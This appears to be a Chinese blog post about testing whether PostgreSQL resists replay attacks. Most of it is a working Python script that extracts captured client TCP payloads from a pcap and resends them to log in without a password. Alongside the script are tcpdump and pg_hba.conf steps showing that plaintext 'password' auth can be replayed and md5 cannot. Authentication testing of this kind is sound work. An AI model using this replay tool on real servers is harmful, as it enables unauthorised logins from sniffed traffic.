PostgreSQL数据库重放攻击测试
验证pg数据库是否能抵抗重放攻击,首先想到的是TCP重放工具tcpreplay,但是,使用的时候发现,该工具能够模拟重放TCP流量,无法实现重放攻击(有可能是学艺不精不会用,如果你会请指教),也就是我抓取psql登录并执行模型sql操作的TCP数据被抓包之后,tcpreplay能模拟将该抓包数据在网卡上再回放一遍(收和发的所有数据),但是不能模拟psql再对pg数据库进行一次登录操作,也就是不能真正的连接数据库。
需要的是:抓取psql登录数据库与数据库进行交互的所有有效数据,然后找个工具连接pg数据库服务器再把这些数据按照原始时间和次序再发送一遍,实现不输入密码(使用抓取的通信数据)完成认证登录和sql操作。最终使用如下脚本实现了该功能:
#!/usr/bin/env python3
import dpkt
import socket
import binascii
import argparse
import time
def extract_tcp_payloads(pcap_file, extraction_port):
"""
从 pcap 文件中提取发往 extraction_port 的 TCP 数据包的有效载荷,
返回一个列表,每个元素是 (timestamp, hex_payload) 元组,其中 hex_payload 为有效载荷的 16 进制字符串表示。
同时将提取出的 16 进制数据输出到终端。
"""
payloads = []
try:
with open(pcap_file, 'rb') as f:
try:
pcap = dpkt.pcap.Reader(f)
except Exception as e:
print(f"读取 pcap 文件时出错:{e}")
return payloads
for ts, buf in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
except Exception:
continue
# 处理 IPv4 和 IPv6
ip = None
if isinstance(eth.data, dpkt.ip.IP):
ip = eth.data
elif isinstance(eth.data, dpkt.ip6.IP6):
ip = eth.data
else:
continue
# 仅关心 TCP 数据包
if not isinstance(ip.data, dpkt.tcp.TCP):
continue
tcp = ip.data
# 仅提取有效载荷长度大于 0 且目标端口为 extraction_port 的数据包
if tcp.dport == extraction_port and len(tcp.data) > 0:
hex_payload = binascii.hexlify(tcp.data).decode('ascii')
payloads.append((ts, hex_payload))
print(f"提取到数据包,时间戳:{ts:.6f},16进制有效载荷:{hex_payload}")
except FileNotFoundError:
print(f"文件 {pcap_file} 未找到。")
except Exception as ex:
print(f"处理 pcap 文件时发生错误:{ex}")
# 排序:确保按照时间戳从小到大排序
payloads.sort(key=lambda x: x[0])
return payloads
def send_payloads_with_interval(payloads, dest_ip, dest_port):
"""
建立一个新的 TCP 连接到指定的目标地址,按照数据包捕获时的时间间隔顺序发送 payloads 中的内容。
提取的数据为 16 进制字符串,发送时先将其转换为原始二进制数据,
并在每次发送后尝试读取对方返回的数据(以 16 进制呈现),捕获 BrokenPipeError 异常。
"""
print(f"\n建立到 {dest_ip}:{dest_port} 的 TCP 连接...")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((dest_ip, dest_port))
except Exception as e:
print(f"连接到目标 {dest_ip}:{dest_port} 失败:{e}")
return
print("连接成功,开始发送数据...\n")
# 设置接收超时(秒),用于后续等待返回数据
sock.settimeout(1)
if not payloads:
print("未提取到有效载荷数据。")
sock.close()
return
# 先发送第一个数据包
t0, first_payload = payloads[0]
print(f"发送第1个数据包,时间戳:{t0:.6f},发送的原始16进制数据:{first_payload}")
try:
raw_payload = binascii.unhexlify(first_payload)
sock.sendall(raw_payload)
except BrokenPipeError:
print(f"BrokenPipeError 在发送第1个数据包时发生,数据:{first_payload}")
sock.close()
return
# 尝试接收返回的数据
try:
recv_data = sock.recv(4096)
if recv_data:
hex_recv = binascii.hexlify(recv_data).decode('ascii')
print(f"接收到返回数据:{hex_recv}")
else:
print("未接收到返回数据。")
except socket.timeout:
print("接收超时,没有返回数据。")
prev_t = t0
for i in range(1, len(payloads)):
ts, hex_payload = payloads[i]
interval = ts - prev_t
if interval > 0:
time.sleep(interval)
print(f"发送第{i+1}个数据包,时间间隔:{interval:.6f} 秒,时间戳:{ts:.6f},发送的原始16进制数据:{hex_payload}")
try:
raw_payload = binascii.unhexlify(hex_payload)
sock.sendall(raw_payload)
except BrokenPipeError:
print(f"BrokenPipeError 在发送第{i+1}个数据包时发生,数据:{hex_payload}")
break
# 接收返回数据
try:
recv_data = sock.recv(4096)
if recv_data:
hex_recv = binascii.hexlify(recv_data).decode('ascii')
print(f"接收到返回数据:{hex_recv}")
else:
print("未接收到返回数据。")
except socket.timeout:
print("接收超时,没有返回数据。")
prev_t = ts
print("所有数据包已发送完毕。")
sock.close()
def main():
parser = argparse.ArgumentParser(
description="从 pcap 文件中提取发往指定 TCP 端口的有效载荷(16进制),"
"并按捕获时的时间顺序重新发送到目标地址,同时输出发送和接收到的16进制数据。")
parser.add_argument("pcap_file", help="pcap 文件路径")
parser.add_argument("extraction_port", type=int, help="提取的目标 TCP 端口(例如 5432)")
parser.add_argument("dest_ip", help="重新发送数据的目标 IP")
parser.add_argument("dest_port", type=int, help="重新发送数据的目标 TCP 端口")
args = parser.parse_args()
print("从 pcap 文件中提取有效载荷数据...")
payloads = extract_tcp_payloads(args.pcap_file, args.extraction_port)
if not payloads:
print("未找到符合条件的 TCP 有效载荷数据包。")
return
print(f"\n共提取到 {len(payloads)} 个数据包。")
send_payloads_with_interval(payloads, args.dest_ip, args.dest_port)
if __name__ == '__main__':
main()
重放登录验证:
配置postgresql.conf文件:
log_connections = on //客户端连接则记录日志
log_disconnections = on //客户端断开则记录日志
log_statement = 'all' //记录所有sql操作
配置pg_hba.conf文件:
host all all 127.0.0.1/32 password
此处必须为password或trust,因为md5等认证方式是有防止重放攻击功能的
tcpdump抓包:
tcpdump -i lo tcp port 5432 -w 5432-0408-4.pcap
新开终端进行登录:
./psql -d postgres -h 127.0.0.1 -p 5432 -U user1 -W
此时数据库服务端会有客户端连接和用户登录日志提示
将上面的抓包数据重放:
python3 extract_and_send_3.py 5432-0408-4.pcap 5432 127.0.0.1 5432
extract_and_send_3.py:上面的重放攻击脚本
5432-0408-4.pcap:上面tcpdump抓包工具抓取的User登录数据
5432:从抓包数据中提取发往5432端口的数据
127.0.0.1 5432:将提取的数据重新发往该IP地址和端口
此时在pg数据库服务端应该再次复现了客户端连接和用户登录日志提示。
然后再修改pg_hba.conf文件使user1使用md5认证,再次按照上述抓包和回放步骤验证:回放工具回放抓包数据失败,服务端仅提示客户端连接但没有登录成功和sql操作日志提示,证明了md5认证算法有防止重放攻击的功能。